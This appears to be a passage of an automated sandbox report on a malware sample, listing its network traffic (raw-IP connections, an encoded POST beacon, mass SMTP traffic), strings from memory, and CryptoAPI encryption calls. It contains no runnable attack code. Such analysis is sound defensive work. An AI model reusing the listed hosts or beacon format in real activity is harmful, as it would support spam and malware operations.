                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Mon, 09 Oct 2023 13:52:29 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: Yuvd4wHy/6hGYTSN3Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <div id="c1576" class="csc-default"><div class="csc-textpic csc-textpic-left csc-textpic-above"><div class="csc-textpic-imagewrap"><ul><li class="csc-textpic-image csc-textpic-firstcol" style="width:20px;"><a href="http://twitter.com/serviceplaner" target="_blank"><img src="uploads/pics/icon_twitter_06.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:20px;"><a href="http://www.facebook.com/serviceplan" target="_blank"><img src="uploads/pics/icon_facebook_06.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:20px;"><a href="https://plus.google.com/103380240365918845366" target="_blank"><img src="uploads/pics/icon_google.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:18px;"><a href="http://bit.ly/sp-xing" target="_blank"><img src="uploads/pics/icon_xing_transp.png" width="18" height="20" alt="" /></a></li><li class="csc-textpic-image csc-textpic-lastcol" style="width:20px;"><a href="http://www.youtube.com/user/ServiceplanVideos" target="_blank"><img src="uploads/pics/icon_youtube.png" width="20" height="20" alt="" /></a></li></ul></div></div><div class="csc-textpic-clear"><!-- --></div></div> equals www.facebook.com (Facebook)
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <div id="c1576" class="csc-default"><div class="csc-textpic csc-textpic-left csc-textpic-above"><div class="csc-textpic-imagewrap"><ul><li class="csc-textpic-image csc-textpic-firstcol" style="width:20px;"><a href="http://twitter.com/serviceplaner" target="_blank"><img src="uploads/pics/icon_twitter_06.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:20px;"><a href="http://www.facebook.com/serviceplan" target="_blank"><img src="uploads/pics/icon_facebook_06.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:20px;"><a href="https://plus.google.com/103380240365918845366" target="_blank"><img src="uploads/pics/icon_google.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:18px;"><a href="http://bit.ly/sp-xing" target="_blank"><img src="uploads/pics/icon_xing_transp.png" width="18" height="20" alt="" /></a></li><li class="csc-textpic-image csc-textpic-lastcol" style="width:20px;"><a href="http://www.youtube.com/user/ServiceplanVideos" target="_blank"><img src="uploads/pics/icon_youtube.png" width="20" height="20" alt="" /></a></li></ul></div></div><div class="csc-textpic-clear"><!-- --></div></div> equals www.twitter.com (Twitter)
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <div id="c1576" class="csc-default"><div class="csc-textpic csc-textpic-left csc-textpic-above"><div class="csc-textpic-imagewrap"><ul><li class="csc-textpic-image csc-textpic-firstcol" style="width:20px;"><a href="http://twitter.com/serviceplaner" target="_blank"><img src="uploads/pics/icon_twitter_06.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:20px;"><a href="http://www.facebook.com/serviceplan" target="_blank"><img src="uploads/pics/icon_facebook_06.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:20px;"><a href="https://plus.google.com/103380240365918845366" target="_blank"><img src="uploads/pics/icon_google.png" width="20" height="20" alt="" /></a></li><li class="csc-textpic-image" style="width:18px;"><a href="http://bit.ly/sp-xing" target="_blank"><img src="uploads/pics/icon_xing_transp.png" width="18" height="20" alt="" /></a></li><li class="csc-textpic-image csc-textpic-lastcol" style="width:20px;"><a href="http://www.youtube.com/user/ServiceplanVideos" target="_blank"><img src="uploads/pics/icon_youtube.png" width="20" height="20" alt="" /></a></li></ul></div></div><div class="csc-textpic-clear"><!-- --></div></div> equals www.youtube.com (Youtube)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.linkedin.com/company/elpro-lepenik/about/" target="_blank"><img id="LinkedIn" alt="LinkedIn" data-src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img id="LinkedIn" alt="LinkedIn" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" /></noscript></a> equals www.linkedin.com (Linkedin)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.facebook.com/elprolepenik/" target="_blank"><img id="Facebook" alt="Facebook" data-src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img id="Facebook" alt="Facebook" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" /></noscript></a> equals www.facebook.com (Facebook)
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/elprolepenik/" /> equals www.facebook.com (Facebook)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.facebook.com (Facebook)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.linkedin.com (Linkedin)
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fserviceplan&amp;width=222&amp;height=210&amp;colorscheme=light&amp;show_faces=true&amp;border_color=%23FFFFFF&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" style="border:1px solid white; overflow:hidden; width:222px; height:210px;" allowtransparency="true"></iframe> equals www.facebook.com (Facebook)
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 74 31 31 62 63 61 62 2b 6b 67 59 66 76 66 54 43 51 51 57 53 41 63 6e 75 4c 52 43 47 77 61 4e 36 4f 76 31 35 4f 67 6e 74 33 71 2f 32 53 71 78 2b 35 33 32 61 4e 65 37 33 74 42 74 62 59 39 6f 65 31 72 6e 46 2b 39 31 34 56 44 6b 50 34 46 4a 6d 69 6e 77 70 79 62 55 74 6e 59 46 42 2f 33 5a 4d 79 50 4b 72 51 70 33 32 38 2f 4f 61 74 75 45 30 57 46 45 44 45 52 74 58 38 6c 47 47 53 62 67 50 36 4d 2f 48 70 45 52 77 75 78 55 72 6b 79 4a 42 4c 7a 4d 45 63 6a 37 6f 75 71 69 32 56 34 73 46 56 72 37 63 39 43 75 37 64 51 4f 57 7a 69 68 69 44 79 41 36 53 4c 69 4f 79 35 6f 57 2b 58 61 37 45 34 65 46 74 6c 58 4b 71 6c 54 39 76 58 77 4c 6f 53 46 4e 5a 50 6e 36 68 52 61 55 4d 32 36 65 4a 69 66 47 5a 70 69 4d 6c 2f 34 4b 69 70 36 69 6b 70 31 4a 79 41 74 33 35 45 70 76 4e 59 62 67 77 51 69 71 78 69 52 6f 41 35 36 4f 59 75 51 68 5a 32 79 50 52 31 34 73 48 6c 5a 38 63 4d 76 50 6e 36 2b 55 65 4c 43 4c 37 30 34 4c 44 39 79 45 4d 61 7a 71 6d 55 64 71 63 2b 61 47 63 33 6d 77 2b 7a 63 68 32 4a 54 64 35 78 72 4c 6e 4a 68 7a 78 35 39 6c 4f 6e 73 2f 6d 6d 41 7a 43 4d 64 55 36 51 6c 6a 57 34 75 67 77 6c 74 7a 4c 6b 57 36 72 31 63 34 38 70 48 62 5a 5a 42 44 44 64 37 64 6c 6c 77 6a 44 6e 6b 43 30 56 45 59 51 43 32 39 36 58 33 39 43 34 48 5a 34 51 76 6e 4a 64 35 6f 2b 48 6b 71 33 49 5a 30 2b 4f 41 75 74 42 33 70 33 72 39 35 57 75 45 44 70 44 6c 73 5a 69 4c 69 63 37 36 4f 62 6b 78 62 6a 70 64 32 5a 74 58 4d 32 46 4d 72 6a 45 2f 6e 4c 4c 6e 44 56 6a 61 7a 32 74 4d 52 48 46 64 62 5a 30 5a 4b 39 52 63 46 53 30 58 71 61 50 33 61 49 4e 4c 48 2f 62 32 76 62 37 74 52 49 47 64 37 59 4f 65 70 50 68 6b 41 6c 44 67 58 6c 42 47 64 50 69 62 6f 45 56 50 71 53 46 44 51 52 46 33 78 42 62 59 58 50 6b 7a 5a 34 46 4d 66 32 76 58 56 4b 63 34 31 46 4f 7a 57 53 6a 65 46 33 69 4c 6c 34 6e 32 7a 39 77 3d 3d Data Ascii: t11bcab+kgYfvfTCQQWSAcnuLRCGwaN6Ov15Ognt3q/2Sqx+532aNe73tBtbY9oe1rnF+914VDkP4FJminwpybUtnYFB/3ZMyPKrQp328/OatuE0WFEDERtX8lGGSbgP6M/HpERwuxUrkyJBLzMEcj7ouqi2V4sFVr7c9Cu7dQOWzihiDyA6SLiOy5oW+Xa7E4eFtlXKqlT9vXwLoSFNZPn6hRaUM26eJifGZpiMl/4Kip6ikp1JyAt35EpvNYbgwQiqxiRoA56OYuQhZ2yPR14sHlZ8cMvPn6+UeLCL704LD9yEMazqmUdqc+aGc3mw+zch2JTd5xrLnJhzx59lOns/mmAzCMdU6QljW4ugwltzLkW6r1c48pHbZZBDDd7dllwjDnkC0VEYQC296X39C4HZ4QvnJd5o+Hkq3IZ0+OAutB3p3r95WuEDpDlsZiLic76Obkxbjpd2ZtXM2FMrjE/nLLnDVjaz2tMRHFdbZ0ZK9RcFS0XqaP3aINLH/b2vb7tRIGd7YOepPhkAlDgXlBGdPiboEVPqSFDQRF3xBbYXPkzZ4FMf2vXVKc41FOzWSjeF3iLl4n2z9w==
                Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:49973 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:50005 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:49998 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:50027 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:50050 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50076 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:50070 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50156 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:50200 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.3:50212 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.3:61759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:54735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:59363 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:59493 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:59495 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:60304 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:60295 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:60293 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:60303 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:60305 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:60785 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.3:65531 version: TLS 1.2

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 46
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_013F8970
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_013F8800
